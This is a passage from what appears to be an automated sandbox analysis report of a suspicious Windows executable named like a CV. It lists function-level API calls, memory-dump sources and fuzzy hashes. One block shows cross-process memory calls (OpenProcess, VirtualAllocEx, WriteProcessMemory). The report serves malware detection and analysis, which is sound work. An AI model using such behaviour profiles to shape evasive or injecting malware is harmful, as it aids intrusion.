                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ForegroundPixelRelease
                                                                                        • String ID:
                                                                                        • API String ID: 4156661090-0
                                                                                        • Opcode ID: 60d9a4ee1ef3ede48a934bcd042ee139bded2fb7b0344bfc39ca3c0805c04048
                                                                                        • Instruction ID: 2c28890a2d019ecee1655006e8e7f1e21706098a48acf5c97d6edf3481dbb1d7
                                                                                        • Opcode Fuzzy Hash: 60d9a4ee1ef3ede48a934bcd042ee139bded2fb7b0344bfc39ca3c0805c04048
                                                                                        • Instruction Fuzzy Hash: 12218176A00204AFD701EFA5D985AAEBBF5EF48301F048879E859AB351DF70AC04CB60
                                                                                        APIs
                                                                                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0039AFE3
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0039AFF2
                                                                                        • BeginPath.GDI32(?), ref: 0039B009
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0039B033
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ObjectSelect$BeginCreatePath
                                                                                        • String ID:
                                                                                        • API String ID: 3225163088-0
                                                                                        • Opcode ID: 0cbbaab0fe68cddd4a4e387f8e02a336f8df9ec96c902e0ddaeebcf9fa6e5b01
                                                                                        • Instruction ID: 95d2603cd9c0da01c21050db22da1635ec2dfce24c3a753a62dc12187fd9fd05
                                                                                        • Opcode Fuzzy Hash: 0cbbaab0fe68cddd4a4e387f8e02a336f8df9ec96c902e0ddaeebcf9fa6e5b01
                                                                                        • Instruction Fuzzy Hash: E621B3B4800309EFEF12DF95ED887AE7B68B711355F16433AE525A61B0D3708885CF94
                                                                                        APIs
                                                                                        • __calloc_crt.LIBCMT ref: 003A21A9
                                                                                        • CreateThread.KERNEL32(?,?,003A22DF,00000000,?,?), ref: 003A21ED
                                                                                        • GetLastError.KERNEL32 ref: 003A21F7
                                                                                        • _free.LIBCMT ref: 003A2200
                                                                                        • __dosmaperr.LIBCMT ref: 003A220B
                                                                                          • Part of subcall function 003A7C0E: __getptd_noexit.LIBCMT ref: 003A7C0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                                                                                        • String ID:
                                                                                        • API String ID: 2664167353-0
                                                                                        • Opcode ID: 22ff4b3b73249fce34d91dc396335ba3c416294d3282f2f9624bb998722ab48d
                                                                                        • Instruction ID: 10c5babc1aecb064ff0f46e0f2d3497ad9f912a31b77fa470df2e5ab7c82be52
                                                                                        • Opcode Fuzzy Hash: 22ff4b3b73249fce34d91dc396335ba3c416294d3282f2f9624bb998722ab48d
                                                                                        • Instruction Fuzzy Hash: E111F933104306AFDB23AFA9DD82EAB7B98EF47770B110529FD14DA191EB71D81187A1
                                                                                        APIs
                                                                                        • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 003BABD7
                                                                                        • GetLastError.KERNEL32(?,003BA69F,?,?,?), ref: 003BABE1
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,003BA69F,?,?,?), ref: 003BABF0
                                                                                        • HeapAlloc.KERNEL32(00000000,?,003BA69F,?,?,?), ref: 003BABF7
                                                                                        • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 003BAC0E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 842720411-0
                                                                                        • Opcode ID: b0508375c23565fe713e38d59a9ab9b7d0f1d91b54114341417e63faddb5522f
                                                                                        • Instruction ID: 70ecaf4c0b116ee88ad54b99aea877615ec1248c5f1636c5ce1d0e206b621026
                                                                                        • Opcode Fuzzy Hash: b0508375c23565fe713e38d59a9ab9b7d0f1d91b54114341417e63faddb5522f
                                                                                        • Instruction Fuzzy Hash: 8C016970700604BFDB114FA9DD48DAB3FACEF8A7587110829F905D3260DA718C84CB64
                                                                                        APIs
                                                                                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003C7A74
                                                                                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003C7A82
                                                                                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 003C7A8A
                                                                                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 003C7A94
                                                                                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003C7AD0
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                        • String ID:
                                                                                        • API String ID: 2833360925-0
                                                                                        • Opcode ID: ccc376595c38c9b3ab92af222bc49db5706203fc73b217a27a5ef204173fd5f0
                                                                                        • Instruction ID: ed01d01147fdcb828dae1329c41527c5b081fc4305b1cbec4018a43b40b52926
                                                                                        • Opcode Fuzzy Hash: ccc376595c38c9b3ab92af222bc49db5706203fc73b217a27a5ef204173fd5f0
                                                                                        • Instruction Fuzzy Hash: 33012939C04619EBCF01AFE9DD48EEDBB78FB1C711F010569E902F2250DB349A548BA5
                                                                                        APIs
                                                                                        • CLSIDFromProgID.OLE32 ref: 003B9ADC
                                                                                        • ProgIDFromCLSID.OLE32(?,00000000), ref: 003B9AF7
                                                                                        • lstrcmpiW.KERNEL32(?,00000000), ref: 003B9B05
                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000), ref: 003B9B15
                                                                                        • CLSIDFromString.OLE32(?,?), ref: 003B9B21
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                        • String ID:
                                                                                        • API String ID: 3897988419-0
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 003BAA79
                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 003BAA83
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 003BAA92
                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 003BAA99
                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 003BAAAF
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        APIs
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 003BAADA
                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 003BAAE4
                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003BAAF3
                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 003BAAFA
                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 003BAB10
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                        • String ID:
                                                                                        • API String ID: 44706859-0
                                                                                        APIs
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 003BEC94
                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 003BECAB
                                                                                        • MessageBeep.USER32(00000000), ref: 003BECC3
                                                                                        • KillTimer.USER32(?,0000040A), ref: 003BECDF
                                                                                        • EndDialog.USER32(?,00000001), ref: 003BECF9
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                        • String ID:
                                                                                        • API String ID: 3741023627-0
                                                                                        APIs
                                                                                        • EndPath.GDI32(?), ref: 0039B0BA
                                                                                        • StrokeAndFillPath.GDI32(?,?,003FE680,00000000,?,?,?), ref: 0039B0D6
                                                                                        • SelectObject.GDI32(?,00000000), ref: 0039B0E9
                                                                                        • DeleteObject.GDI32 ref: 0039B0FC
                                                                                        • StrokePath.GDI32(?), ref: 0039B117
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                        • String ID:
                                                                                        • API String ID: 2625713937-0
                                                                                        APIs
                                                                                        • CoInitialize.OLE32(00000000), ref: 003CF2DA
                                                                                        • CoCreateInstance.OLE32(0040DA7C,00000000,00000001,0040D8EC,?), ref: 003CF2F2
                                                                                        • CoUninitialize.OLE32 ref: 003CF555
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateInitializeInstanceUninitialize
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 948891078-24824748
                                                                                        APIs
                                                                                          • Part of subcall function 0038660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003853B1,?,?,003861FF,?,00000000,00000001,00000000), ref: 0038662F
                                                                                        • CoInitialize.OLE32(00000000), ref: 003CE85D
                                                                                        • CoCreateInstance.OLE32(0040DA7C,00000000,00000001,0040D8EC,?), ref: 003CE876
                                                                                        • CoUninitialize.OLE32 ref: 003CE893
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CreateFullInitializeInstanceNamePathUninitialize__itow__swprintf
                                                                                        • String ID: .lnk
                                                                                        • API String ID: 2126378814-24824748
                                                                                        APIs
                                                                                        • __startOneArgErrorHandling.LIBCMT ref: 003A32ED
                                                                                          • Part of subcall function 003AE0D0: __87except.LIBCMT ref: 003AE10B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorHandling__87except__start
                                                                                        • String ID: pow
                                                                                        • API String ID: 2905807303-2276729525
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,0041DC50,?,0000000F,0000000C,00000016,0041DC50,?), ref: 003C4645
                                                                                          • Part of subcall function 0038936C: __swprintf.LIBCMT ref: 003893AB
                                                                                          • Part of subcall function 0038936C: __itow.LIBCMT ref: 003893DF
                                                                                        • CharUpperBuffW.USER32(?,?,00000000,?), ref: 003C46C5
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharUpper$__itow__swprintf
                                                                                        • String ID: REMOVE$THIS
                                                                                        • API String ID: 3797816924-776492005
                                                                                        APIs
                                                                                          • Part of subcall function 003C430B: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003BBC08,?,?,00000034,00000800,?,00000034), ref: 003C4335
                                                                                        • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 003BC1D3
                                                                                          • Part of subcall function 003C42D6: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,003BBC37,?,?,00000800,?,00001073,00000000,?,?), ref: 003C4300
                                                                                          • Part of subcall function 003C422F: GetWindowThreadProcessId.USER32(?,?), ref: 003C425A
                                                                                          • Part of subcall function 003C422F: OpenProcess.KERNEL32(00000438,00000000,?,?,?,003BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 003C426A
                                                                                          • Part of subcall function 003C422F: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,003BBBCC,00000034,?,?,00001004,00000000,00000000), ref: 003C4280
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003BC240
                                                                                        • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 003BC28D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmp
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmp
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
                                                                                        • String ID: @
                                                                                        • API String ID: 4150878124-2766056989
                                                                                        • Opcode ID: 6b1f8483b14ebfa84e8ab27685f5d77cb7042540760018581bac765aa2f0b6e0
                                                                                        • Instruction ID: 46312158c3adc1e4049e1c18d1666d5c007cc31b2628a121f611c52fc8af24fb
                                                                                        • Opcode Fuzzy Hash: 6b1f8483b14ebfa84e8ab27685f5d77cb7042540760018581bac765aa2f0b6e0
                                                                                        • Instruction Fuzzy Hash: C7412D76900218AFDB11DFA4CD91FEEB778AF49700F004499FA45BB181DA716E45CB61
                                                                                        APIs
                                                                                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,0041DC00,00000000,?,?,?,?), ref: 003EA6D8
                                                                                        • GetWindowLongW.USER32 ref: 003EA6F5
                                                                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 003EA705
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: Window$Long
                                                                                        • String ID: SysTreeView32
                                                                                        • API String ID: 847901565-1698111956
                                                                                        • Opcode ID: 0d9451f95c51043b6a2159be0876ecfa31df6041073546d894acc23ebcac04ca
                                                                                        • Instruction ID: b719398f653871c21f0f8c5b592d1fff3221bec695ceaf3f98f2f0473eb6c41b
                                                                                        • Opcode Fuzzy Hash: 0d9451f95c51043b6a2159be0876ecfa31df6041073546d894acc23ebcac04ca
                                                                                        • Instruction Fuzzy Hash: 3F31DE31600659ABDF128F79CC41BEA7BA9EB49324F254725F875A32E0C730F8509B94
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 003D5190
                                                                                        • InternetCrackUrlW.WININET(?,00000000,00000000,?), ref: 003D51C6
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: CrackInternet_memset
                                                                                        • String ID: |$D=
                                                                                        • API String ID: 1413715105-3304556432
                                                                                        • Opcode ID: 556c9ef6765809e0bc568177f1af3d16559a413e5c0bbd30169dfbe6bbda0346
                                                                                        • Instruction ID: 86c9d5dfad665af3e9bd9f41189b34f00fb2c8580f4f8e94d22db6256b9780ea
                                                                                        • Opcode Fuzzy Hash: 556c9ef6765809e0bc568177f1af3d16559a413e5c0bbd30169dfbe6bbda0346
                                                                                        • Instruction Fuzzy Hash: 25313D71C10219ABCF02EFE4DC45AEE7FB9FF14750F100056F815AA266DB316A06DB60
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 003EA15E
                                                                                        • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 003EA172
                                                                                        • SendMessageW.USER32(?,00001002,00000000,?), ref: 003EA196
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Window
                                                                                        • String ID: SysMonthCal32
                                                                                        • API String ID: 2326795674-1439706946
                                                                                        • Opcode ID: bcc2980f6da4fbce55820c638230e88ea07ec7c1ed35a44e2c32c57b3038b4bd
                                                                                        • Instruction ID: e4636621c4eb2f774f170dd7f24c2da2e218e8707c5d160523317c5be18deafe
                                                                                        • Opcode Fuzzy Hash: bcc2980f6da4fbce55820c638230e88ea07ec7c1ed35a44e2c32c57b3038b4bd
                                                                                        • Instruction Fuzzy Hash: F421A132510228ABDF128F94CC86FEA3B79EF48754F110214FE55AB1D0D6B5BC55CB94
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 003EA941
                                                                                        • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 003EA94F
                                                                                        • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 003EA956
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend$DestroyWindow
                                                                                        • String ID: msctls_updown32
                                                                                        • API String ID: 4014797782-2298589950
                                                                                        • Opcode ID: f835de6c8695caa72b7da252535d174ecb6861c7bae7a1b1a501fc0870b7122c
                                                                                        • Instruction ID: 6f4d5f9f848b46304b2bd4d425af1fbacd7ca15c162349b6cf90317bd27f6993
                                                                                        • Opcode Fuzzy Hash: f835de6c8695caa72b7da252535d174ecb6861c7bae7a1b1a501fc0870b7122c
                                                                                        • Instruction Fuzzy Hash: 1021B0B5600619AFDB02DF29CC81D7737ADEB4A3A4B060159FA049B3A2CB31FC118B61
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 003E9A30
                                                                                        • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 003E9A40
                                                                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 003E9A65
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend$MoveWindow
                                                                                        • String ID: Listbox
                                                                                        • API String ID: 3315199576-2633736733
                                                                                        • Opcode ID: d16b083a5fbdbc250432d552367ad911346ea4fbb4e2f4c269195f99424d0a57
                                                                                        • Instruction ID: 2fba609791df38b13893ad873f20ddda8cc197f5645aa20623f8b426debf6707
                                                                                        • Opcode Fuzzy Hash: d16b083a5fbdbc250432d552367ad911346ea4fbb4e2f4c269195f99424d0a57
                                                                                        • Instruction Fuzzy Hash: 8F21C532610168BFDF128F55CC85FBB3BAAEF89750F02822AF9445B1E0C7719C5187A0
                                                                                        APIs
                                                                                        • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 003EA46D
                                                                                        • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 003EA482
                                                                                        • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 003EA48F
                                                                                        Strings
                                                                                        Similarity
                                                                                        • API ID: MessageSend
                                                                                        • String ID: msctls_trackbar32
                                                                                        • API String ID: 3850602802-1010561917
                                                                                        • Opcode ID: 7f56ac822c584f08150d8617c08dae3d5af469d2e1a7df46f77bc09c968436d8
                                                                                        • Instruction ID: 942e375342a4e30e80c0d6e39ebe2fa471a43620f6706ac1195018e13823a46b
                                                                                        • Opcode Fuzzy Hash: 7f56ac822c584f08150d8617c08dae3d5af469d2e1a7df46f77bc09c968436d8
